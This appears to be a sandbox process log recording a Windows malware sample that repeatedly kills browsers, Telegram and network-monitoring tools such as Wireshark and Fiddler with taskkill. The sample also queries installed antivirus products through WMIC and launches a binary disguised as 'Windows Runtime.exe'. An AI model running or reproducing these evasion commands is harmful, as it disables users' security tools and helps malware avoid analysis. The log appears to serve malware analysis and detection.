C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Users\Admin\AppData\Local\Temp\oknssj.exe
"C:\Users\Admin\AppData\Local\Temp\oknssj.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Users\Admin\AppData\Local\Temp\oknssj.exe
"C:\Users\Admin\AppData\Local\Temp\oknssj.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
